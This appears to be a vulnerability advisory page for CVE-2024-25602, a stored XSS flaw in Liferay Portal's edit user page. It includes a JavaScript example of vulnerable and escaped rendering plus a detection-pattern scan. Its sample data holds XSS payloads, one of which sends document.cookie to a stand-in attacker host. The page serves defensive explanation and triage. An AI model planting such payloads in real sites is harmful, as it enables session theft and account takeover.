Stored XSS Vulnerability in Liferay Portal's Edit User Page
CVE-2024-25602

5.4 MEDIUM

Key Information:

Vendor: Liferay
Status: Vendor
CVE Published: 21 February 2024

What is CVE-2024-25602?

A stored cross-site scripting (XSS) vulnerability exists in the edit user page of the Users Admin module in Liferay Portal and Liferay DXP. It affects Liferay Portal 7.2.0 through 7.4.2 (and older, unsupported versions), Liferay DXP 7.3 before service pack 3, and Liferay DXP 7.2 before fix pack 17. A remote authenticated user who is allowed to set an organization's 'Name' field can store a crafted payload there; because the stored name is later rendered on the edit user page without adequate output encoding, arbitrary web script or HTML runs in the browser of any user who opens that page. Since the page is part of the administration UI, the injected script executes with the viewing administrator's session and privileges, which is enough to perform actions as that user or to read data shown to them. The required privilege is low (an ordinary authenticated account with rights to edit an organization), which is why the CVSS scope is rated Changed and user interaction Required.
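How this class of bug works and how it is closed, as an added example that is not Liferay code and is not taken from the advisory: the vulnerable and hardened renderers below are constructed stand-ins for the markup that places an organization name on the edit user page, and the organization names are constructed sample data (the two payloads are typical of what a low-privileged user with rights to edit an organization could store). Liferay's Java code base ships its own escaping helper (HtmlUtil); `escapeHtml` here plays that role for the HTML text and double-quoted attribute contexts only. The `findSuspiciousOrgNames` check is the kind of query an incident responder runs over stored names to learn whether anyone has already tried this on a not-yet-patched instance.

```javascript
// Added example, not Liferay Portal code: stored XSS via an organization
// "Name" field, the output-encoding fix, and a triage scan of stored names.
// All function names and sample data below are constructed for illustration.

// Escape the five characters that can break out of HTML text or a
// double-quoted attribute. Sufficient for those two contexts only.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the stored organization name is concatenated into the
// page markup as-is, so whatever the attacker saved becomes live DOM in the
// browser of every administrator who opens the edit user page.
function renderOrgRowVulnerable(orgName) {
  return `<tr><td class="org-name">${orgName}</td></tr>`;
}

// Hardened pattern: identical markup, but the untrusted value is encoded for
// the HTML text context before it is emitted.
function renderOrgRowHardened(orgName) {
  return `<tr><td class="org-name">${escapeHtml(orgName)}</td></tr>`;
}

// Triage heuristics for an incident responder reviewing stored organization
// names (for example an export of the name column of Liferay's Organization_ table).
const MARKUP_INDICATORS = [
  /<\s*\/?\s*[a-z][\w-]*/i, // tag-like token such as <img or </script
  /\bon[a-z]+\s*=/i,        // inline event handler such as onerror=
  /javascript\s*:/i,        // javascript: URL scheme
  /&#x?[0-9a-f]+;?/i,       // numeric character references used to obfuscate
];

// Return the subset of names that match at least one indicator.
function findSuspiciousOrgNames(orgNames) {
  return orgNames.filter((name) => MARKUP_INDICATORS.some((re) => re.test(name)));
}

// Constructed sample data: two legitimate names and two payloads of the kind
// a low-privileged user with permission to edit an organization could store.
const SAMPLE_ORG_NAMES = [
  'Liferay, Inc.',
  'R&D Department',
  '<img src=x onerror="alert(document.cookie)">',
  'Sales"><script>fetch("//attacker.example/?c=" + document.cookie)</script>',
];

// Show each flagged name rendered both ways and return the flagged list.
function demo(orgNames = SAMPLE_ORG_NAMES) {
  const flagged = findSuspiciousOrgNames(orgNames);
  for (const name of flagged) {
    console.log('vulnerable:', renderOrgRowVulnerable(name));
    console.log('hardened  :', renderOrgRowHardened(name));
  }
  return flagged;
}

demo();
```

Output encoding must match the sink context: the same name placed inside a JavaScript string or a URL needs JavaScript or URL encoding instead, and a field that is meant to carry HTML needs an allow-list sanitizer rather than escaping. The scan is a triage heuristic, not proof: a legitimate name containing angle brackets or "&#" produces a false positive, and payloads split across fields or hidden behind unusual encodings can slip past it, so flagged rows still need a human look.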

Affected Version(s)

Liferay DXP 7.3.10 through 7.3.10-dxp-2 (DXP 7.3 before service pack 3)

Liferay DXP 7.2.10 through 7.2.10-dxp-16 (DXP 7.2 before fix pack 17)

Liferay Portal 7.2.0 through 7.4.2 (and older, unsupported versions)

CVSS V3.1

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Score: 5.4
Severity: MEDIUM
Confidentiality: Low
Integrity: Low
Availability: None
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed

Timeline

  • Vulnerability reserved

  • Vulnerability published: 21 February 2024